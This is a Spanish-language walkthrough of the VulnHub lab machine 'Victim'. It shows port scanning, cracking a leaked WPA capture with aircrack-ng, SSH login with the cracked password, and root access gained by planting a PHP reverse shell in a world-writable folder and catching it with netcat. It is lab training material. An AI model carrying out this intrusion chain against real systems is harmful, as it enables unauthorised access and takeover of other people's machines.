[VLN] Victim

Hoy vamos a hackear la maquina de Vulnhub llamada Victim. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/victim-1,469/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.79 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 13:08 CEST Nmap scan report for 192.168.1.79 Host is up (0.0023s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA) | 256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA) |_ 256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 8080/tcp open http BusyBox httpd 1.13 |_http-title: 404 Not Found 8999/tcp open http WebFS httpd 1.21 |_http-server-header: webfs/1.21 |_http-title: 0.0.0.0:8999/ 9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1) |_http-title: Uncaught Exception: MissingDatabaseExtensionException Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 146.45 seconds

Despues de mirar los puertos abiertos, visitamos el siguiente enlace: http://192.168.1.79:8999/ Podemos ver que hay un archivo, que por el nombre y la extension indica que es una captura de paquetes de red,y posiblemente algo relacionado con WPA: http://192.168.1.79:8999/WPA.cap Nos descargamos el fichero, y lo crackeamos:

sml@Cassandra:~/Descargas$ aircrack-ng WPA-01.cap -w /home/sml/rockyou.txt [00:00:07] 70679/14344392 keys tested (10580.06 k/s) Time left: 22 minutes, 29 seconds 0.49% Current passphrase: p4ssword KEY FOUND! [ p4ssword ]

Abrimos el fichero con Wireshark y vemos que el SSID es "dlink" Nos logueamos usando el SSID como nombre de usuario, y la password que acabamos de crackear (dlink/p4ssword).

Low Shell

sml@Cassandra:~$ ssh dlink@192.168.1.79 The authenticity of host '192.168.1.79 (192.168.1.79)' can't be established. ECDSA key fingerprint is SHA256:rlY5QcLGFoLjkoNzEVHA0e3fVUALcYpJ3l9rqJRyPCY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.79' (ECDSA) to the list of known hosts. dlink@192.168.1.79's password: Last login: Tue Apr 7 23:36:49 2020 from 192.168.86.99

Miramos los procesos que se estan ejecutando para ver si hay alguno interesante.

dlink@victim01:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.4 159668 8812 ? Ss 11:07 0:01 /sbin/init maybe-ubiquity root 2 0.0 0.0 0 0 ? S 11:07 0:00 [kthreadd] root 4 0.0 0.0 0 0 ? I< 11:07 0:00 [kworker/0:0H] root 6 0.0 0.0 0 0 ? I< 11:07 0:00 [mm_percpu_wq] root 7 0.1 0.0 0 0 ? S 11:07 0:04 [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 11:07 0:03 [rcu_sched] root 9 0.0 0.0 0 0 ? I 11:07 0:00 [rcu_bh] root 10 0.0 0.0 0 0 ? S 11:07 0:00 [migration/0] root 11 0.0 0.0 0 0 ? S 11:07 0:00 [watchdog/0] root 12 0.0 0.0 0 0 ? S 11:07 0:00 [cpuhp/0] root 13 0.0 0.0 0 0 ? S 11:07 0:00 [kdevtmpfs] root 14 0.0 0.0 0 0 ? I< 11:07 0:00 [netns] root 15 0.0 0.0 0 0 ? S 11:07 0:00 [rcu_tasks_kthre] root 16 0.0 0.0 0 0 ? S 11:07 0:00 [kauditd] root 17 0.0 0.0 0 0 ? S 11:07 0:00 [khungtaskd] root 18 0.0 0.0 0 0 ? S 11:07 0:00 [oom_reaper] root 19 0.0 0.0 0 0 ? I< 11:07 0:00 [writeback] root 20 0.0 0.0 0 0 ? S 11:07 0:00 [kcompactd0] root 21 0.0 0.0 0 0 ? SN 11:07 0:00 [ksmd] root 22 0.0 0.0 0 0 ? SN 11:07 0:00 [khugepaged] root 23 0.0 0.0 0 0 ? I< 11:07 0:00 [crypto] root 24 0.0 0.0 0 0 ? I< 11:07 0:00 [kintegrityd] root 25 0.0 0.0 0 0 ? I< 11:07 0:00 [kblockd] root 26 0.0 0.0 0 0 ? I< 11:07 0:00 [ata_sff] root 27 0.0 0.0 0 0 ? I< 11:07 0:00 [md] root 28 0.0 0.0 0 0 ? I< 11:07 0:00 [edac-poller] root 29 0.0 0.0 0 0 ? I< 11:07 0:00 [devfreq_wq] root 30 0.0 0.0 0 0 ? I< 11:07 0:00 [watchdogd] root 34 0.0 0.0 0 0 ? S 11:07 0:00 [kswapd0] root 35 0.0 0.0 0 0 ? I< 11:07 0:00 [kworker/u3:0] root 36 0.0 0.0 0 0 ? S 11:07 0:00 [ecryptfs-kthrea] root 78 0.0 0.0 0 0 ? I< 11:07 0:00 [kthrotld] root 79 0.0 0.0 0 0 ? I< 11:07 0:00 [acpi_thermal_pm] root 80 0.0 0.0 0 0 ? S 11:07 0:00 [scsi_eh_0] root 81 0.0 0.0 0 0 ? I< 11:07 0:00 [scsi_tmf_0] root 82 0.0 0.0 0 0 ? S 11:07 0:00 [scsi_eh_1] root 83 0.0 0.0 0 0 ? I< 11:07 0:00 [scsi_tmf_1] root 89 0.0 0.0 0 0 ? I< 11:07 0:00 [ipv6_addrconf] root 98 0.0 0.0 0 0 ? I< 11:07 0:00 [kstrp] root 115 0.0 0.0 0 0 ? I< 11:07 0:00 [charger_manager] root 177 0.0 0.0 0 0 ? I< 11:07 0:00 [kworker/0:1H] root 195 0.0 0.0 0 0 ? S 11:07 0:00 [scsi_eh_2] root 196 0.0 0.0 0 0 ? I< 11:07 0:00 [scsi_tmf_2] root 197 0.0 0.0 0 0 ? I< 11:07 0:00 [ttm_swap] root 198 0.0 0.0 0 0 ? S 11:07 0:00 [irq/18-vmwgfx] root 269 0.0 0.0 0 0 ? I< 11:07 0:00 [raid5wq] root 322 0.0 0.0 0 0 ? S 11:07 0:00 [jbd2/sda2-8] root 323 0.0 0.0 0 0 ? I< 11:07 0:00 [ext4-rsv-conver] root 331 0.0 0.5 315672 11816 ? Ss 12:05 0:00 php -S 0.0.0.0:9000 -t /var/www/bolt/public/ root 397 0.0 0.0 0 0 ? I< 11:07 0:00 [iscsi_eh] root 407 0.0 0.0 0 0 ? I< 11:07 0:00 [ib-comp-wq] root 408 0.0 0.0 0 0 ? I< 11:07 0:00 [ib-comp-unb-wq] root 409 0.0 0.0 0 0 ? I< 11:07 0:00 [ib_mcast] root 410 0.0 0.0 0 0 ? I< 11:07 0:00 [ib_nl_sa_wq] root 411 0.0 0.0 0 0 ? I< 11:07 0:00 [rdma_cm] root 420 0.0 0.2 46764 5464 ? Ss 11:07 0:00 /lib/systemd/systemd-udevd root 422 0.0 0.0 97708 1680 ? Ss 11:07 0:00 /sbin/lvmetad -f dlink 453 0.0 0.1 34404 2808 pts/0 R+ 12:10 0:00 ps aux systemd+ 461 0.0 0.1 141936 3192 ? Ssl 11:08 0:00 /lib/systemd/systemd-timesyncd root 511 0.0 0.0 0 0 ? I< 11:08 0:00 [iprt-VBoxWQueue] systemd+ 680 0.0 0.2 80180 5596 ? Ss 11:08 0:00 /lib/systemd/systemd-networkd systemd+ 702 0.2 0.2 70640 4948 ? Ss 11:08 0:08 /lib/systemd/systemd-resolved root 774 0.0 0.8 169104 16800 ? Ssl 11:08 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 775 0.0 0.4 434332 9532 ? Ssl 11:08 0:00 /usr/sbin/ModemManager --filter-policy=strict daemon 777 0.0 0.1 28332 2048 ? Ss 11:08 0:00 /usr/sbin/atd -f root 778 0.0 0.1 30028 2888 ? Ss 11:08 0:00 /usr/sbin/cron -f message+ 780 0.0 0.2 50264 4484 ? Ss 11:08 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog- root 802 0.0 0.1 57400 2984 ? S 11:08 0:00 /usr/sbin/CRON -f root 822 0.0 0.0 4628 832 ? Ss 11:08 0:00 /bin/sh -c sleep 30 && /var/www/bolt/public/bolt_start.sh root 833 0.0 0.2 45248 5360 ? Ss 11:08 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant root 834 0.0 0.6 405488 13636 ? Ssl 11:08 0:00 /usr/sbin/NetworkManager --no-daemon root 845 0.0 0.2 62148 5756 ? Ss 11:08 0:00 /lib/systemd/systemd-logind root 846 0.0 0.3 288532 6828 ? Ssl 11:08 0:00 /usr/lib/accountsservice/accounts-daemon root 851 0.0 0.0 621536 1820 ? Ssl 11:08 0:01 /usr/bin/lxcfs /var/lib/lxcfs/ syslog 853 0.0 0.1 263036 4032 ? Ssl 11:08 0:00 /usr/sbin/rsyslogd -n root 854 0.0 1.1 639292 23552 ? Ssl 11:08 0:00 /usr/lib/snapd/snapd root 905 0.0 0.3 288884 6288 ? Ssl 11:08 0:00 /usr/lib/policykit-1/polkitd --no-debug root 954 0.0 0.9 185944 19008 ? Ssl 11:08 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal root 986 0.0 1.0 448404 21656 ? Ssl 11:08 0:02 /usr/bin/python3 /usr/bin/fail2ban-server -xf start root 1112 0.0 0.2 72300 5952 ? Ss 11:08 0:00 /usr/sbin/sshd -D root 1113 0.0 0.0 14888 1688 tty1 Ss+ 11:08 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux mysql 1158 0.0 8.7 1162256 178652 ? Sl 11:08 0:02 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid www-data 1169 0.0 0.1 43444 2372 ? Ss 11:08 0:00 /usr/bin/webfsd -k /var/run/webfs/webfsd.pid -r /var/www/html -n victim01 -i 0.0.0.0 -p 8999 -u www- root 1321 0.0 1.9 480416 40688 ? Ss 11:08 0:00 /usr/sbin/apache2 -k start www-data 1348 0.2 1.9 483452 38824 ? S 11:08 0:07 /usr/sbin/apache2 -k start www-data 1349 0.2 2.0 483456 41312 ? S 11:08 0:08 /usr/sbin/apache2 -k start root 1415 0.0 0.0 4628 760 ? S 11:08 0:00 /bin/sh /var/www/bolt/public/bolt_start.sh root 1417 26.0 1.6 315672 33076 ? S 11:08 16:03 php -S 0.0.0.0:9000 -t /var/www/bolt/public/ root 1418 0.1 0.0 5140 472 ? Ss 11:08 0:05 busybox httpd -p 0.0.0.0:8080 -h /home/victim01 www-data 1592 0.2 1.9 483316 38932 ? S 11:10 0:07 /usr/sbin/apache2 -k start www-data 1595 0.2 1.7 483120 36688 ? S 11:10 0:07 /usr/sbin/apache2 -k start www-data 1596 0.2 1.8 483120 36748 ? S 11:10 0:07 /usr/sbin/apache2 -k start www-data 1597 0.2 1.9 483452 40464 ? S 11:10 0:07 /usr/sbin/apache2 -k start www-data 1598 0.2 1.9 483452 39116 ? S 11:10 0:07 /usr/sbin/apache2 -k start www-data 1785 0.1 1.8 483256 36884 ? S 11:11 0:05 /usr/sbin/apache2 -k start www-data 1786 0.1 1.8 483120 36748 ? S 11:11 0:05 /usr/sbin/apache2 -k start www-data 1789 0.1 1.9 483452 38860 ? S 11:11 0:05 /usr/sbin/apache2 -k start dlink 31042 0.0 0.1 74656 3292 ? S 11:52 0:00 sshd: dlink@pts/0 dlink 31043 0.0 0.2 19960 4656 pts/0 Ss 11:52 0:00 -bash

Vemos que el siguiente proceso esta lanzado como root: root 1417 26.0 1.6 315672 33076 ? S 11:08 16:03 php -S 0.0.0.0:9000 -t /var/www/bolt/public/ Comprobamos si podemos escribir en alguna de sus carpetas.

dlink@victim01:~$ ls -l /var/www/bolt/public/ total 28 drwxr-xr-x 6 root root 4096 Nov 12 17:23 bolt-public -rwxr-xr-x 1 root root 45 Apr 7 22:01 bolt_start.sh drwxr-xr-x 2 root root 4096 Aug 25 2018 extensions drwxrwxrwx 2 root root 4096 May 7 12:05 files -rw-r--r-- 1 root root 295 Aug 25 2018 index.php drwxr-xr-x 5 root root 4096 Nov 12 17:23 theme drwxr-xr-x 2 root root 4096 Aug 25 2018 thumbs

Vemos que en la carpeta /var/www/bolt/public/files tenemos permiso de escritura.

Privilege Escalation

Preparamos una reverse-shell en php para ponerla en /var/www/bolt/public/files y asi obtener una shell de root.

sml@Cassandra~$ cp /usr/share/webshells/php/php-reverse-shell.php webshell.php

Editamos la shell y modificamos los valores para poner nuestra IP y puerto. Una vez modificada, la copiamos a la maquina victima.

sml@Cassandra:~$ scp webshell.php dlink@192.168.1.79:/var/www/bolt/public/files dlink@192.168.1.79's password: webshell.php sml@Cassandra:~$ nc -nlvp 5555

Accedemos a: http://192.168.1.79:9000/files/webshell.php

sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.79] 41524 Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 12:05:49 up 57 min, 1 user, load average: 0.00, 0.00, 0.09 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT dlink pts/0 192.168.1.148 11:52 1:32 0.30s 0.30s -bash uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off # whoami root

flag.txt

# cd /root # ls flag.txt snap # cat flag.txt Nice work! .:##:::. .:::::/;;\:. ()::::::@::/;;#;|:. ::::##::::|;;##;|:: ':::::::::\;;;/::' '::::::::::: |O|O|O|O|O|O :#:::::::##::. .:###:::::#:::::. :::##:::::::::::#:. ::::;:::::::::###::. ':::;::###::;::#::::: ::::;::#::;:::::::::: :##:;::::::;::::###::: . .:::::; .:::##:::::::::::::::: ::::::; :::::::::::::::::##:: #rootdance